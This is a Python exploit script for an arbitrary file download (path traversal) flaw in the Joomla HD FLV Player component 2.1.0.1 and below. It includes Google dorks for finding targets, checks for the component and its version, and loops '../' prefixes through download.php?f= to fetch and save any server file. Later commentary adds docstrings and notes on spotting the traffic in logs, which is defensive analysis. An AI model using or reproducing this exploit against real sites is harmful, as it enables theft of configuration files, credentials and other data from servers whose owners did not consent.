Exploit Com_HDFlvplayer

  1. #!/usr/bin/env python
  2. #
  3. # Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  4. #
  5. # Exploit Author : Claudio Viviani
  6. #
  7. # Vendor Homepage : http://www.hdflvplayer.net/
  8. #
  9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
  10. #
  11. # Dork google 1:  inurl:/component/hdflvplayer/
  12. # Dork google 2:  inurl:com_hdflvplayer    
  13. #
  14. # Date : 2014-11-11
  15. #
  16. # Tested on : BackBox 3.x/4.x
  17. #
  18. # Info:
  19. #       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  20. #       The variable "f" is not sanitized.
  21. #       Over 80.000 downloads (statistic reported on official site)
  22. #
  23. #
  24. # Video Demo: http://youtu.be/QvBTKFLBQ20
  25. #
  26. #
  27. # Http connection
  28. import urllib, urllib2
  29. # String manipulation
  30. import re
  31. # Time management
  32. import time
  33. # Args management
  34. import optparse
  35. # Error management
  36. import sys
  37.  
# ASCII-art start-up banner; the script prints it after argument parsing
# (and together with the usage text when -t/-f are missing).
banner = """
       _______                      __           ___ ___ ______
      |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
      |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
      |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
      |:  1   |                                 |:  |   |:  1    /
      |::.. . |                                 |::.|:. |::.. . /
      `-------'                                 `--- ---`------'
       _______ ___     ___ ___     _______ __
      |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
      |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
      |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
      |:  |   |:  1   |:  1   |   |:  |            |_____|
      |::.|   |::.. . |\:.. ./    |::.|
      `---'   `-------' `---'     `---'
 
                                        <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
 
                               Written by:
 
                             Claudio Viviani
 
                          http://www.homelab.it
 
                             info@homelab.it
                         homelabit@protonmail.ch
 
                     https://www.facebook.com/homelabit
                       https://twitter.com/homelabit
                     https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
  70.  
  71. # Check url
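def checkurl(url):
    """Return ``url`` unchanged if it carries an explicit http/https scheme.

    Args:
        url: target base URL as given on the command line.

    Returns:
        The same string when it starts with ``http://`` or ``https://``.

    Raises:
        SystemExit: with status 1, after printing an error line, when the
            scheme is missing or not one of the two accepted ones.  An empty
            string takes this path as well.
    """
    # One startswith() call with a tuple covers both accepted schemes; this
    # also fixes the "procotol" typo in the original error message.
    if not url.startswith(("http://", "https://")):
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    return url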
  78.  
  79.  
def checkcomponent(url,headers):
    """Print a FOUND / Not FOUND status for the HD FLV component path.

    The caller has already written the ``[+] Searching ...`` prefix; this
    function overwrites that console line via ``\\r``.  On HTTPError it exits
    with status 1, on URLError it prints a message and returns.

    NOTE(review): the Request object is only constructed and never passed to
    ``urllib2.urlopen`` (``req`` is unused), so as far as this code shows no
    HTTP request is sent here and neither except branch can be reached from
    it; FOUND is printed whenever the constructor succeeds.  The first real
    network access happens in ``checkversion``.
    """

    try:
        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        # Python 2 print statement; the script is written for Python 2.
        print '[X] Connection Error'
  91.  
def checkversion(url,headers):
    """Print the component version read from the module manifest XML.

    Requests ``<url>/modules/mod_hdflvplayer/mod_hdflvplayer.xml`` with the
    supplied ``headers`` and, for every response line containing
    ``<version>``, prints the text between the first ``>`` and ``<`` on that
    line over the ``[+] Checking Version:`` prefix the caller already wrote.

    Side effects: on HTTPError prints "Unknown" and returns normally; on
    URLError prints a connection error and exits with status 1.  The
    response object is not closed explicitly.
    """

    try:
        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
        response = urllib2.urlopen(req).readlines()

        for line_version in response:

            if not line_version.find("<version>") == -1:

                # '>(.*?)<' is not anchored to the <version> tag: it yields the
                # content of the first tag on the line, which is the version
                # only when no other tag precedes it.  Each hit is written with
                # a leading "\r", so if several lines match only the last one
                # stays visible.
                VER = re.compile('>(.*?)<').search(line_version).group(1)

                sys.stdout.write("\r[+] Checking Version: "+str(VER))
        print("")

    except urllib2.HTTPError:
       sys.stdout.write("\r[+] Checking Version: Unknown")

    except urllib2.URLError:
        print("\n[X] Connection Error")
        sys.exit(1)
  113.  
def connection(url,headers,pathtrav):
    """Request download.php with 1..19 ``../`` segments prefixed to ``pathtrav``.

    Each attempt fetches
    ``<url>/components/com_hdflvplayer/hdflvplayer/download.php?f=<prefix><pathtrav>``
    with the given ``headers``, sleeps one second, and extends a ``#`` progress
    bar on the console.  A response body that is non-empty and does not contain
    PHP's "failed to open stream" warning text is treated as success: the URL is
    printed, the user is asked to [D]ownload or [R]ead, and the function returns
    True after saving the body under the last path segment of ``pathtrav`` in
    the current directory or printing it to stdout.

    Returns:
        True once a file has been saved or shown; otherwise the loop runs out,
        the "not found" line is printed and None is returned.

    Error handling: an HTTPError for one depth is swallowed and the next depth
    is tried; a URLError prints a message but the loop keeps going as well.

    Observation for log review: every attempt carries the same fixed
    User-Agent and the literal ``download.php?f=../`` pattern, one request per
    second, which is what this probing looks like from the server side.
    """

    char = "../"
    bar = "#"
    s = ""          # accumulated "../" prefix; grows by one segment per iteration
    barcount = ""   # accumulated progress-bar text

    # range(1,20) gives 19 attempts; the loop index itself is never used.
    for a in range(1,20):

        s += char
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()

        try:
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
            response = urllib2.urlopen(req)

            content = response.read()

            # An empty body or the PHP open/include warning means the server
            # did not hand back the requested file at this depth.
            if content != "" and not "failed to open stream" in content:
                print("\n[!] VULNERABLE")
                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                print("")
                print("[+] Do you want [D]ownload or [R]ead the file?")
                print("[+]")
                sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")

                # Accepted answers; input is lower-cased before the lookup.
                download = set(['d'])
                read  = set(['r'])

                while True:
                    choice = raw_input().lower()
                    if choice in download:
                        # Re-fetches the same URL (the body already read into
                        # ``content`` is not reused) and writes it to the
                        # basename of pathtrav in the working directory.
                        filedown = pathtrav.split('/')[-1]
                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                        print("[!] DOWNLOADED!")
                        print("[!] Check file: "+filedown)
                        return True
                    elif choice in read:
                        print("")
                        # Python 2 print statement: dumps the body as-is.
                        print content
                        return True
                    else:
                        sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")

        except urllib2.HTTPError:
            # An HTTP error status for this depth is ignored; the loop sleeps
            # and moves on to the next "../" depth.
            pass
        except urllib2.URLError:
            # Connection-level failure: reported, but the loop is not stopped.
            print '\n[X] Connection Error'

        time.sleep(1)
    print("\n[X] File not found or fixed component :(")
  168.  
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
# -t: base URL of the site; checkurl() below insists on an explicit scheme.
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
# -f: server-side path handed to connection() as its ``pathtrav`` argument.
commandList.add_option('-f', '--file', action="store",
                  help="Insert file to check",
                  )
options, remainder = commandList.parse_args()

# Check args: both options are mandatory; print banner + usage and stop otherwise.
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

url = checkurl(options.target)
pathtrav = options.file

# One hard-coded User-Agent is sent with every request.  Being a fixed
# string, it is an easy value to match in web-server access logs.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

# Each helper overwrites the status prefix written here using "\r".
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)